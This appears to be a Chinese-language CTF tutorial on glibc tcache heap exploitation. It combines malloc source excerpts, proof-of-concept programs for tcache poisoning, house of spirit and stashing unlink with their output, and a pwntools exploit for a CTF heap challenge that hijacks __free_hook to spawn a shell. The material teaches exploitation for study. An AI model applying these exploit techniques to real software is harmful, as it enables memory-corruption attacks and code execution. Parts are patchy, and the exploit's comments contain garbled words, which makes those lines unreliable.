/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */typedefstruct tcache_entry{struct tcache_entry *next;} tcache_entry;/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct"). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. */typedefstruct tcache_perthread_struct{charcounts[TCACHE_MAX_BINS]; tcache_entry *entries[TCACHE_MAX_BINS];} tcache_perthread_struct;static __thread tcache_perthread_struct *tcache =NULL;
由于 glibc 2.29 中新增了对于 unsorted bin 链表完整性检查,这使得 unsorted bin attack 完全失效,我们的目标是往一个地址中写入 large value ,这种情况下就可以选择 tcache stashing unlink attack。
首先我们可以通过UAF来泄露 heap 和 libc 地址。具体方式是分配并释放多个chunk使其进入 tcache ,通过 Show 函数可以输出 tcache bin 的 fd 值来泄露堆地址。释放某个 small bin size 范围内的chunk七个,在第八次释放时会先把释放的堆块放入 unsorted bin 。通过 Show 函数可以泄露出 libc 地址。
我们首先通过 UAF 将 __malloc_hook 链入 tcache 备用。然后分配并释放六次 0x100 大小的chunk进入 tcache 。通过 unsorted bin 切割得到 last remainer 的方式得到两个大小为 0x100 的chunk。再分配一个超过 0x100 的块使其进入 small bin 。按照释放顺序我们称之为 bin1 和 bin2 。修改 bin2->bk 为 (heap_base+0x2f)-0x10 ,调用 calloc(0xf0) 触发 small bin 放入 tcache 的处理逻辑,由于 tcache 中有 6 个块,因此循环处理只会进行一次,这样也避免了 fake_chunk 因 bk 处无可写地址作为下一个块进行 unlink 时 bck->fd=bin 带来的内存访问错误。最终改掉 heap_base+0x30 的值绕过检查。
/* This is another arbitrary limit, which tunables can change. Each
tcache bin will hold at most this number of chunks. */
# define TCACHE_FILL_COUNT 7
#endif
_int_free (mstate av, mchunkptr p, int have_lock)
{
INTERNAL_SIZE_T size; /* its size */
mfastbinptr *fb; /* associated fastbin */
mchunkptr nextchunk; /* next contiguous chunk */
INTERNAL_SIZE_T nextsize; /* its size */
int nextinuse; /* true if nextchunk is used */
INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */
mchunkptr bck; /* misc temp for linking */
mchunkptr fwd; /* misc temp for linking */
size = chunksize (p);
/* Little security check which won't hurt performance: the
allocator never wrapps around at the end of the address space.
Therefore we can exclude some size values which might appear
here by accident or by "design" from some intruder. */
if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
|| __builtin_expect (misaligned_chunk (p), 0))
malloc_printerr ("free(): invalid pointer");
/* We know that each chunk is at least MINSIZE bytes in size or a
multiple of MALLOC_ALIGNMENT. */
if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
malloc_printerr ("free(): invalid size");
check_inuse_chunk(av, p);
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
#endif
......
}
if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
{
idx = fastbin_index (nb);
mfastbinptr *fb = &fastbin (av, idx);
mchunkptr pp;
victim = *fb;
if (victim != NULL)
{
if (SINGLE_THREAD_P)
*fb = victim->fd;
else
REMOVE_FB (fb, pp, victim);
if (__glibc_likely (victim != NULL))
{
size_t victim_idx = fastbin_index (chunksize (victim));
if (__builtin_expect (victim_idx != idx, 0))
malloc_printerr ("malloc(): memory corruption (fast)");
check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (SINGLE_THREAD_P)
*fb = tc_victim->fd;
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}
}
#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count;
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif
#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached)
{
return tcache_get (tc_idx);
}
#endif
glibc_2.26 [master●] bat tcache_poisoning.c
───────┬─────────────────────────────────────────────────────────────────────────────────
│ File: tcache_poisoning.c
───────┼─────────────────────────────────────────────────────────────────────────────────
1 │ #include <stdio.h>
2 │ #include <stdlib.h>
3 │ #include <stdint.h>
4 │
5 │ int main()
6 │ {
7 │ fprintf(stderr, "This file demonstrates a simple tcache poisoning attack
│ by tricking malloc into\n"
8 │ "returning a pointer to an arbitrary location (in this case, the
│ stack).\n"
9 │ "The attack is very similar to fastbin corruption attack.\n\n");
10 │
11 │ size_t stack_var;
12 │ fprintf(stderr, "The address we want malloc() to return is %p.\n", (char
│ *)&stack_var);
13 │
14 │ fprintf(stderr, "Allocating 1 buffer.\n");
15 │ intptr_t *a = malloc(128);
16 │ fprintf(stderr, "malloc(128): %p\n", a);
17 │ fprintf(stderr, "Freeing the buffer...\n");
18 │ free(a);
19 │
20 │ fprintf(stderr, "Now the tcache list has [ %p ].\n", a);
21 │ fprintf(stderr, "We overwrite the first %lu bytes (fd/next pointer) of t
│ he data at %p\n"
22 │ "to point to the location to control (%p).\n", sizeof(intptr_t),
│ a, &stack_var);
23 │ a[0] = (intptr_t)&stack_var;
24 │
25 │ fprintf(stderr, "1st malloc(128): %p\n", malloc(128));
26 │ fprintf(stderr, "Now the tcache list has [ %p ].\n", &stack_var);
27 │
28 │ intptr_t *b = malloc(128);
29 │ fprintf(stderr, "2st malloc(128): %p\n", b);
30 │ fprintf(stderr, "We got the control\n");
31 │
32 │ return 0;
33 │ }
───────┴─────────────────────────────────────────────────────────────────────────────────
glibc_2.26 [master●] ./tcache_poisoning
This file demonstrates a simple tcache poisoning attack by tricking malloc into
returning a pointer to an arbitrary location (in this case, the stack).
The attack is very similar to fastbin corruption attack.
The address we want malloc() to return is 0x7fff0d28a0c8.
Allocating 1 buffer.
malloc(128): 0x55f666ee1260
Freeing the buffer...
Now the tcache list has [ 0x55f666ee1260 ].
We overwrite the first 8 bytes (fd/next pointer) of the data at 0x55f666ee1260
to point to the location to control (0x7fff0d28a0c8).
1st malloc(128): 0x55f666ee1260
Now the tcache list has [ 0x7fff0d28a0c8 ].
2st malloc(128): 0x7fff0d28a0c8
We got the control
#include <stdio.h>
#include <stdlib.h>
int main()
{
fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");
fprintf(stderr, "Ok. Let's start with the example!.\n\n");
fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
malloc(1);
fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
unsigned long long *a; //pointer that will be overwritten
unsigned long long fake_chunks[10]; //fake chunk region
fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);
fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
fake_chunks[1] = 0x40; // this is the size
fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
a = &fake_chunks[2];
fprintf(stderr, "Freeing the overwritten pointer.\n");
free(a);
fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}
#include <stdio.h>
#include <stdlib.h>
int main(){
unsigned long stack_var[0x10] = {0};
unsigned long *chunk_lis[0x10] = {0};
unsigned long *target;
fprintf(stderr, "This file demonstrates the stashing unlink attack on tcache.\n\n");
fprintf(stderr, "This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
fprintf(stderr, "This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
fprintf(stderr, "The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
fprintf(stderr, "This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");
// stack_var emulate the fake_chunk we want to alloc to
fprintf(stderr, "Stack_var emulates the fake chunk we want to alloc to.\n\n");
fprintf(stderr, "First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");
stack_var[3] = (unsigned long)(&stack_var[2]);
fprintf(stderr, "You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
fprintf(stderr, "Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
fprintf(stderr, "Now we alloc 9 chunks with malloc.\n\n");
//now we malloc 9 chunks
for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}
//put 7 tcache
fprintf(stderr, "Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");
for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}
fprintf(stderr, "As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");
//last tcache bin
free(chunk_lis[1]);
//now they are put into unsorted bin
free(chunk_lis[0]);
free(chunk_lis[2]);
//convert into small bin
fprintf(stderr, "Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");
malloc(0xa0);//>0x90
//now 5 tcache bins
fprintf(stderr, "Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");
malloc(0x90);
malloc(0x90);
fprintf(stderr, "Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);
//change victim->bck
/*VULNERABILITY*/
chunk_lis[2][1] = (unsigned long)stack_var;
/*VULNERABILITY*/
//trigger the attack
fprintf(stderr, "Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");
calloc(1,0x90);
fprintf(stderr, "Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);
//malloc and return our fake chunk on stack
target = malloc(0x90);
fprintf(stderr, "As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
return 0;
}
#include <stdlib.h>
#include <stdio.h>
int main()
{
long *a = malloc(0x1000);
malloc(0x10);
free(a);
printf("%p\n",a[0]);
}
#include <stdlib.h>
#include <stdio.h>
int main(int argc , char* argv[])
{
long* t[7];
long *a=malloc(0x100);
long *b=malloc(0x10);
// make tcache bin full
for(int i=0;i<7;i++)
t[i]=malloc(0x100);
for(int i=0;i<7;i++)
free(t[i]);
free(a);
// a is put in an unsorted bin because the tcache bin of this size is full
printf("%p\n",a[0]);
}
index 6d7a6a8..f730d7a 100644 (file)
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -2967,6 +2967,8 @@ mremap_chunk (mchunkptr p, size_t new_size)
typedef struct tcache_entry
{
struct tcache_entry *next;
+ /* This field exists to detect double frees. */
+ struct tcache_perthread_struct *key;
} tcache_entry;
/* There is one of these for each thread, which contains the
@@ -2990,6 +2992,11 @@ tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
+
+ /* Mark this chunk as "in the tcache" so the test in _int_free will
+ detect a double free. */
+ e->key = tcache;
+
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
@@ -3005,6 +3012,7 @@ tcache_get (size_t tc_idx)
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
+ e->key = NULL;
return (void *) e;
}
@@ -4218,6 +4226,26 @@ _int_free (mstate av, mchunkptr p, int have_lock)
{
size_t tc_idx = csize2tidx (size);
+ /* Check to see if it's already in the tcache. */
+ tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+ /* This test succeeds on double free. However, we don't 100%
+ trust it (it also matches random payload data at a 1 in
+ 2^<size_t> chance), so verify it's not an unlikely coincidence
+ before aborting. */
+ if (__glibc_unlikely (e->key == tcache && tcache))
+ {
+ tcache_entry *tmp;
+ LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+ for (tmp = tcache->entries[tc_idx];
+ tmp;
+ tmp = tmp->next)
+ if (tmp == e)
+ malloc_printerr ("free(): double free detected in tcache 2");
+ /* If we get here, it was a coincidence. We've wasted a few
+ cycles, but don't abort. */
+ }
+
if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
zj@zj-virtual-machine:~/c_study/lctf2018/easy$ checksec ./easy_heap
[*] '/home/zj/c_study/lctf2018/easy/easy_heap'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
# step 1: get three unsortedbin chunks
# note that to avoid top consolidation, we need to arrange them like:
# tcache * 6 -> unsortd * 3 -> tcache
for i in range(7):
new(0x10, str(i) + ' - tcache')
for i in range(3):
new(0x10, str(i + 7) + ' - unsorted') # three unsorted bin chunks
# arrange:
for i in range(6):
delete(i)
delete(9)
for i in range(6, 9):
delete(i)
+-----+
| | <-- tcache perthread 结构体
+-----+
| ... | <-- 6 个 tcache 块
+-----+
| A | <-- 3 个 unsorted bin 块
+-----+
| B |
+-----+
| C |
+-----+
| | <-- tcache 块,防止 top 合并
+-----+
| top |
| .. |
for i in range(7):
new(0x10, str(i) + ' - tcache')
# rearrange to take second unsorted bin into tcache chunk, but leave first
# unsorted bin unchanged
new(0x10, '7 - first')
new(0x10, '8 - second')
new(0x10, '9 - third')
for i in range(6):
delete(i)
# move second into tcache
delete(8)
#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
import sys
import os
import os.path
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = process('./easy_heap')
def cmd(idx):
p.recvuntil('>')
p.sendline(str(idx))
def new(size, content):
cmd(1)
p.recvuntil('>')
p.sendline(str(size))
p.recvuntil('> ')
if len(content) >= size:
p.send(content)
else:
p.sendline(content)
def delete(idx):
cmd(2)
p.recvuntil('index \n> ')
p.sendline(str(idx))
def show(idx):
cmd(3)
p.recvuntil('> ')
p.sendline(str(idx))
return p.recvline()[:-1]
def main():
# Your exploit script goes here
# step 1: get three unsortedbin chunks
# note that to avoid top consolidation, we need to arrange them like:
# tcache * 6 -> unsortd * 3 -> tcache
for i in range(7):
new(0x10, str(i) + ' - tcache')
for i in range(3):
new(0x10, str(i + 7) + ' - unsorted') # three unsorted bin chunks
# arrange:
for i in range(6):
delete(i)
delete(9)
for i in range(6, 9):
delete(i)
# step 2: use unsorted bin to overflow, and do unlink, trigger consolidation (overecvlineap)
for i in range(7):
new(0x10, str(i) + ' - tcache')
# rearrange to take second unsorted bin into tcache chunk, but leave first
# unsorted bin unchanged
new(0x10, '7 - first')
new(0x10, '8 - second')
new(0x10, '9 - third')
for i in range(6):
delete(i)
# move second into tcache
delete(8)
# delete first to provide valid fd & bk
delete(7)
new(0xf8, '0 - overflow')
# fill up tcache
delete(6)
# trigger
delete(9)
# step 3: leak, fill up
for i in range(7):
new(0x10, str(i) + ' - tcache')
new(0x10, '8 - fillup')
libc_leak = u64(show(0).strip().ljust(8, '\x00'))
p.info('libc leak {}'.format(hex(libc_leak)))
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc.address = libc_leak - 0x3ebca0
# step 4: constrecvuntilct UAF, write into __free_hook
new(0x10, '9 - next')
# these two provides sendlineots for tcache
delete(1)
delete(2)
delete(0)
delete(9)
new(0x10, p64(libc.symbols['__free_hook'])) # 0
new(0x10, '/bin/sh\x00into target') # 1
one_gadget = libc.address + 0x4f322
new(0x10, p64(one_gadget))
# system("/bin/sh\x00")
delete(1)
p.interactive()
if __name__ == '__main__':
main()
zj@zj-virtual-machine:~/c_study/hitcon2018/pwn1$ checksec ./baby_tcache
[*] '/home/zj/c_study/hitcon2018/pwn1/baby_tcache'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
int new()
{
_QWORD *v0; // rax
signed int i; // [rsp+Ch] [rbp-14h]
_BYTE *malloc_p; // [rsp+10h] [rbp-10h]
unsigned __int64 size; // [rsp+18h] [rbp-8h]
for ( i = 0; ; ++i )
{
if ( i > 9 )
{
LODWORD(v0) = puts(":(");
return (signed int)v0;
}
if ( !bss_arr[i] )
break;
}
printf("Size:");
size = str2llnum();
if ( size > 0x2000 )
exit(-2);
malloc_p = malloc(size);
if ( !malloc_p )
exit(-1);
printf("Data:");
read_input((__int64)malloc_p, size);
malloc_p[size] = 0; // null byte bof
bss_arr[i] = malloc_p;
v0 = size_arr;
size_arr[i] = size;
return (signed int)v0;
}
int
_IO_new_file_overflow (_IO_FILE *f, int ch)
{
if (f->_flags & _IO_NO_WRITES)
{
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
/* If currently reading or no buffer allocated. */
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
{
:
:
}
if (ch == EOF)
return _IO_do_write (f, f->_IO_write_base, // 需要调用的目标,如果使得 _IO_write_base < _IO_write_ptr,且 _IO_write_base 处
// 存在有价值的地址 (libc 地址)则可进行泄露
// 在正常情况下,_IO_write_base == _IO_write_ptr 且位于 libc 中,所以可进行部分写
f->_IO_write_ptr - f->_IO_write_base);
static
_IO_size_t
new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)
{
_IO_size_t count;
if (fp->_flags & _IO_IS_APPENDING) /* 需要满足 */
/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */
fp->_offset = _IO_pos_BAD;
else if (fp->_IO_read_end != fp->_IO_write_base)
{
............
}
count = _IO_SYSWRITE (fp, data, to_do); // 这里真正进行 write